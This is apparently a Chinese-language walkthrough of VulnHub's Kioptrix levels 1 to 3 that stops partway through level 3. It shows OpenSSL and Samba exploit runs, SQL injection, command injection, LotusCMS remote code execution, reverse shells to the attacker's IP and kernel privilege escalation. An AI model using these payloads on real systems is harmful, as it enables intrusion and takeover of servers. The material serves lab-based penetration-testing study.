vulnhub-Kioptrix系列-wp

前言

vulhub上提供了许多靶机,供安全爱好者学习渗透测试使用,是很好的用来入门渗透测试的环境

Kioptrix系列有多个靶机,每一个靶机都能有不同的姿势来进行渗透

Kioptrix#1

下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

  • 靶机ip 192.168.214.136
  • kali ip 192.168.214.135

openssl漏洞

先上nmap扫

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# Nmap 7.70 scan initiated Fri Sep 28 21:38:59 2018 as: nmap -sS -A -oN /root/Desktop/kioptrix1.txt 192.168.214.136
Nmap scan report for 192.168.214.136
Host is up (0.015s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: mMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2018-09-29T01:41:08+00:00; +1m52s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:43:1E:F2 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: 1m51s, deviation: 0s, median: 1m51s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT      ADDRESS
1   14.76 ms 192.168.214.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 28 21:43:26 2018 -- 1 IP address (1 host up) scanned in 267.95 seconds

打开主页,是apache的测试页面,用dirb扫目录能扫出来一些但都没有什么用

通过nmap,能发现

  1. Apache/1.3.20
  2. mod_ssl/2.8.4 OpenSSL/0.9.6b
  3. 139端口的Samba服务
  4. Linux 2.4.X Red-Hat/Linux

searchsploit查一下apache的exp,发现下面几条好像能用

1
2
3
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                                 | exploits/unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow                                               | exploits/unix/remote/764.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow                         | exploits/unix/remote/40347.txt
1
cp /usr/share/exploitdb/exploits/unix/remote/764.c ~/Desktop/764.c

按照给出的编译命令并不能正常编译,不过也给出了update的操作

http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/

按照他给的操作,不过另外还要安装apt-get install libssl1.0-dev

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
gcc -o OpenFuck 764.c -lcrypto

root@kali:~/Desktop# ./OpenFuck 0x6a 192.168.214.136

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80fc4e8
Ready to send shellcode
Spawning shell...
Good Bye!
root@kali:~/Desktop# ./OpenFuck 0x6b 192.168.214.136

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80fc4e8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304- 
--22:36:29--  http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--22:36:30--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   3.74 MB/s

22:36:31 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 7390
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
ls
p
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root

拿到shell直接就是root权限了

还有第三个exp也可以用,openssl-too-open

1
2
3
wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40347.tar.gz

tar -xzvf 40347.tar.gz

直接make有问题,查了下也没找到解决方法,看报错是ssl2.c里的问题,想到上一个exp里修改的,加了#include <openssl/x509.h> #include <openssl/evp.h>这两个头文件,然后就能成功make了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
root@kali:~/Desktop/openssl-too-open# ./openssl-too-open 
: openssl-too-open : OpenSSL remote exploit
  by Solar Eclipse <solareclipse@phreedom.org>

Usage: ./openssl-too-open [options] <host>
  -a <arch>          target architecture (default is 0x00)
  -p <port>          SSL port (default is 443)
  -c <N>             open N apache connections before sending the shellcode (default is 30)
  -m <N>             maximum number of open connections (default is 50)
  -v                 verbose mode

Supported architectures:
	0x00 - Gentoo (apache-1.3.24-r2)
	0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
	0x02 - Slackware 7.0 (apache-1.3.26)
	0x03 - Slackware 8.1-stable (apache-1.3.26)
	0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
	0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
	0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
	0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
	0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
	0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
	0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
	0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
	0x0c - SuSE Linux 7.0 (apache-1.3.12)
	0x0d - SuSE Linux 7.1 (apache-1.3.17)
	0x0e - SuSE Linux 7.2 (apache-1.3.19)
	0x0f - SuSE Linux 7.3 (apache-1.3.20)
	0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
	0x11 - SuSE Linux 8.0 (apache-1.3.23)
	0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
	0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
	0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
	0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)

Examples: ./openssl-too-open -a 0x01 -v localhost
          ./openssl-too-open -p 1234 192.168.0.1 -c 40 -m 80

root@kali:~/Desktop/openssl-too-open# ./openssl-too-open -a 0x09 192.168.214.136
: openssl-too-open : OpenSSL remote exploit
  by Solar Eclipse <solareclipse@phreedom.org>

: Opening 30 connections
  Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
  ssl0 : 0x80f8050
  ssl1 : 0x80f8050
  ssl2 : 0x80f8050

: Sending shellcode
ciphers: 0x80f8050   start_addr: 0x80f7f90   SHELLCODE_OFS: 208
  Execution of stage1 shellcode succeeded, sending stage2
  Spawning shell...

bash: no job control in this shell
bash-2.05$ 
bash-2.05$ uname -a; id; w;
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
 11:11pm  up  2:25,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
bash-2.05$ 
bash-2.05$ ls
ls
bin
boot
dev
etc
home
initrd
lib
lost+found
misc
mnt
opt
proc
root
sbin
tmp
usr
var
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$

但用这个exp是apache权限

samba漏洞

拿maf的smb_version扫描版本,发现是2.2.1a

searchsploit samba看看有没有能用的漏洞

发现有一条
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | exploits/multiple/remote/10.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
root@kali:~# cp /usr/share/exploitdb/exploits/multiple/remote/10.c ~/Desktop/10.c
root@kali:~# cd Desktop/
root@kali:~/Desktop# gcc 10.c -o fucksamba
root@kali:~/Desktop# chmod +x fucksamba 
root@kali:~/Desktop# ./fucksamba 
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./fucksamba [-bBcCdfprsStv] [host]

-b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step>       bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)
-f              force
-p <port>       port to attack (default = 139)
-r <ret>        return address
-s              scan mode (random)
-S <network>    scan mode
-t <type>       presets (0 for a list)
-v              verbose mode
root@kali:~/Desktop# ./fucksamba -b 0 -v 192.168.214.136
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root

这样得到的也是root权限

Kioptrix#2

下载地址: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

  • 靶机ip 192.168.214.138
  • kali ip 192.168.214.139

nmap扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
root@kali:~# nmap -sS -A 192.168.214.138
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-15 09:10 EDT
Nmap scan report for 192.168.214.138
Host is up (0.00026s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            678/udp  status
|_  100024  1            681/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2018-10-15T10:01:19+00:00; -3h09m45s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:E1:91:66 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: -3h09m45s, deviation: 0s, median: -3h09m45s

TRACEROUTE
HOP RTT     ADDRESS
1   0.26 ms 192.168.214.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.43 seconds

web端弹shell

打开主页http://192.168.214.138/是一个登陆框

查看页面源代码提示Administator
<!-- Start of HTML when logged in as Administator -->

Administator'or'1'='1万能密码能登陆

登陆后是一个执行ping命令的输入框,没有过滤,能进行命令注入,弹个shell

1
127.0.0.1 | bash -i >& /dev/tcp/192.168.214.139/7777 0>&1
1
2
3
4
5
6
7
8
9
10
root@kali:/# nc -lvvp 7777
listening on [any] 7777 ...
192.168.214.138: inverse host lookup failed: Unknown host
connect to [192.168.214.139] from (UNKNOWN) [192.168.214.138] 32769
bash: no job control in this shell
bash-3.00$ ls
index.php
pingit.php
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)

看下index.php的源码,有数据库的链接密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
bash-3.00$ cat index.php
cat index.php
<?php
	mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
	//print "Connected to MySQL<br />";
	mysql_select_db("webapp");
	
	if ($_POST['uname'] != ""){
		$username = $_POST['uname'];
		$password = $_POST['psw'];
		$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
		//print $query."<br>";
		$result = mysql_query($query);

		$row = mysql_fetch_array($result);
		//print "ID: ".$row['id']."<br />";
	}

?>
<html>
<body>
<?php
if ($row['id']==""){
?>
<form method="post" name="frmLogin" id="frmLogin" action="index.php">
	<table width="300" border="1" align="center" cellpadding="2" cellspacing="2">
		<tr>
			<td colspan='2' align='center'>
			<b>Remote System Administration Login</b>
			</td>
		</tr>
		<tr>
			<td width="150">Username</td>
			<td><input name="uname" type="text"></td>
		</tr>
		<tr>
			<td width="150">Password</td>
			<td>
			<input name="psw" type="password">
			</td>
		</tr>
		<tr>
			<td colspan="2" align="center">
			<input type="submit" name="btnLogin" value="Login">
			</td>
		</tr>
	</table>
</form>
<?php
	} //END of login form
?>

<!-- Start of HTML when logged in as Administator -->
<?php
	if ($row['id']==1){
?>
	<form name="ping" action="pingit.php" method="post" target="_blank">
		<table width='600' border='1'>
		<tr valign='middle'>
			<td colspan='2' align='center'>
			<b>Welcome to the Basic Administrative Web Console<br></b>
			</td>
		</tr>
		<tr valign='middle'>
			<td align='center'>
				Ping a Machine on the Network:
			</td>
				<td align='center'>
				<input type="text" name="ip" size="30">
				<input type="submit" value="submit" name="submit">
			</td>
			</td>
		</tr>
	</table>
	</form>


<?php
}
?>
</body>
</html>

尝试切换john账户,使用密码hiroshima,但是密码不对

尝试提权

1
2
3
4
5
6
7
8
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ lsb_release -a
LSB Version:	:core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID:	CentOS
Description:	CentOS release 4.5 (Final)
Release:	4.5
Codename:	Final

发现是CentOS 4.5,内核2.6.9

searchsploit CentOS看一下有没有漏洞

发现有一条exp符合

1
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Lo | exploits/linux/local/9545.c

反弹的shell上编译执行exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
bash-3.00$ wget 192.168.214.139/9542.c
--06:34:52--  http://192.168.214.139/9542.c
           => `9542.c'
Connecting to 192.168.214.139:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,643 (2.6K) [text/plain]

    0K ..                                                    100%  315.07 MB/s

06:34:52 (315.07 MB/s) - `9542.c' saved [2643/2643]

bash-3.00$ gcc -o 0x82-CVE-2009-2698 9542.c
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ls
0x82-CVE-2009-2698
9542.c
les.sh
bash-3.00$ ./0x82-CVE-2009-2698
sh: no job control in this shell

sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

得到root权限

Kioptrix#3

下载地址: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

  • 靶机ip 192.168.214.140
  • kali ip 192.168.214.139

namp扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root@kali:~# nmap -sS -A 192.168.214.140
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-18 08:51 EDT
Nmap scan report for 192.168.214.140
Host is up (0.00032s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:A9:2C:B4 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.32 ms 192.168.214.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds

LotusCMS RCE

打开主页,能发现是LotusCMS,扫描也能发现是LotusCMS
iwLIde.png

1
2
root@kali:~# whatweb http://192.168.214.140
http://192.168.214.140 [200 OK] Apache[2.2.8], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch], IP[192.168.214.140], maybe LotusCMS, Meta-Author[name of author - Manjeet Singh Sawhney   www.manjeetss.com], PHP[5.2.4-2ubuntu5.6][Suhosin-Patch], Title[Ligoat Security - Got Goat? Security ...], X-Powered-By[PHP/5.2.4-2ubuntu5.6]

搜索发现存在远程命令执行漏洞
iwL5ZD.png

本地监听反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
http://kioptrix3.com/index.php?page=index%27);system(%27nc%20-e%20/bin/bash%20192.168.214.139%207777%27);//

root@kali:~# nc -lvvp 7777
listening on [any] 7777 ...
connect to [192.168.214.139] from kioptrix3.com [192.168.214.140] 44671
ls
cache
core
data
favicon.ico
gallery
gnu-lgpl.txt
index.php
modules
style
update.php
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

成功得到shell

1
2
3
4
5
6
7
8
9
10
$ uname -a
uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 8.04.3 LTS
Release:	8.04
Codename:	hardy

之后想利用漏洞来提权,但试了好几个exp都没有成功

1
2
3
4
www-data@Kioptrix3:/tmp$ ls
ls
40616.c  5092.c  8556.c      a.out  c0w    les.sh
5092	 5093.c  LinEnum.sh  bak    c0w.c

搜集信息

看下passwd,发现还有loneferretdreg用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

dreg用户家目录没什么东西,而loneferret家目录里有点东西

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
www-data@Kioptrix3:/home/loneferret$ ls -al
ls -al
total 64
drwxr-xr-x 3 loneferret loneferret  4096 Apr 17  2011 .
drwxr-xr-x 5 root       root        4096 Apr 16  2011 ..
-rw-r--r-- 1 loneferret users         13 Apr 18  2011 .bash_history
-rw-r--r-- 1 loneferret loneferret   220 Apr 11  2011 .bash_logout
-rw-r--r-- 1 loneferret loneferret  2940 Apr 11  2011 .bashrc
-rw------- 1 root       root          15 Apr 15  2011 .nano_history
-rw-r--r-- 1 loneferret loneferret   586 Apr 11  2011 .profile
drwx------ 2 loneferret loneferret  4096 Apr 14  2011 .ssh
-rw-r--r-- 1 loneferret loneferret     0 Apr 11  2011 .sudo_as_admin_successful
-rw-r--r-- 1 root       root         224 Apr 16  2011 CompanyPolicy.README
-rwxrwxr-x 1 root       root       26275 Jan 12  2011 checksec.sh
www-data@Kioptrix3:/home/loneferret$ cat CompanyPolicy.README
cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
www-data@Kioptrix3:/home/loneferret$ sudo ht
sudo ht
[sudo] password for www-data:

sudo命令需要输入密码,gg

再去网站看看,扫下目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
root@kali:~# dirb http://kioptrix3.com /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Oct 18 10:47:56 2018
URL_BASE: http://kioptrix3.com/
WORDLIST_FILES: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

-----------------

GENERATED WORDS: 87568                                                         

---- Scanning URL: http://kioptrix3.com/ ----
==> DIRECTORY: http://kioptrix3.com/modules/                                                                                                                 
==> DIRECTORY: http://kioptrix3.com/gallery/                                                                                                                 
+ http://kioptrix3.com/data (CODE:403|SIZE:324)                                                                                                              
==> DIRECTORY: http://kioptrix3.com/core/                                                                                                                    
==> DIRECTORY: http://kioptrix3.com/style/                                                                                                                   
==> DIRECTORY: http://kioptrix3.com/cache/                                                                                                                   
==> DIRECTORY: http://kioptrix3.com/phpmyadmin/                                                                                                              
                                                                                                                                                             
---- Entering directory: http://kioptrix3.com/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                             
---- Entering directory: http://kioptrix3.com/gallery/ ----
==> DIRECTORY: http://kioptrix3.com/gallery/themes/                                                                                                          
==> DIRECTORY: http://kioptrix3.com/gallery/photos/                                                                                                          
                                                                                                                                                             
---- Entering directory: http://kioptrix3.com/core/ ----
==> DIRECTORY: http://kioptrix3.com/core/view/                                                                                                               
==> DIRECTORY: http://kioptrix3.com/core/lib/                                       


......

发现有phpmyadmin,默认密码root/root登录失败,已经拿到了shell,获得mysql密码只要去看下配置文件

数据库配置文件

来到网站的家目录,寻找下数据库的配置文件

  1. grep "localhost" ./ -R
1
2
grep "localhost" ./ -R
./gallery/gconfig.php:	$GLOBALS["gallarific_mysql_server"] = "localhost";
  1. ls -l -R | grep config
1
2
3
4
5
6
7
8
9
10
11
www-data@Kioptrix3:/home/www/kioptrix3.com$ ls -l -R | grep config
ls -l -R | grep config
drwxrwxrwx  3 root root 4096 Apr 14  2011 config
./data/config:
./data/config/modules:
-rwxrwxrwx 1 root root  369 Aug  3  2010 config.txt
-rw-r--r-- 1 root root  1440 Apr 14  2011 gconfig.php

www-data@Kioptrix3:/home/www/kioptrix3.com$ locate gconfig.php
locate gconfig.php
/home/www/kioptrix3.com/gallery/gconfig.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
www-data@Kioptrix3:/home/www/kioptrix3.com$ cat /home/www/kioptrix3.com/gallery/gconfig.php
<w/kioptrix3.com$ cat /home/www/kioptrix3.com/gallery/gconfig.php            
<?php
	error_reporting(0);
	/*
		A sample Gallarific configuration file. You should edit
		the installer details below and save this file as gconfig.php
		Do not modify anything else if you don't know what it is.
	*/

	// Installer Details -----------------------------------------------

	// Enter the full HTTP path to your Gallarific folder below,
	// such as http://www.yoursite.com/gallery
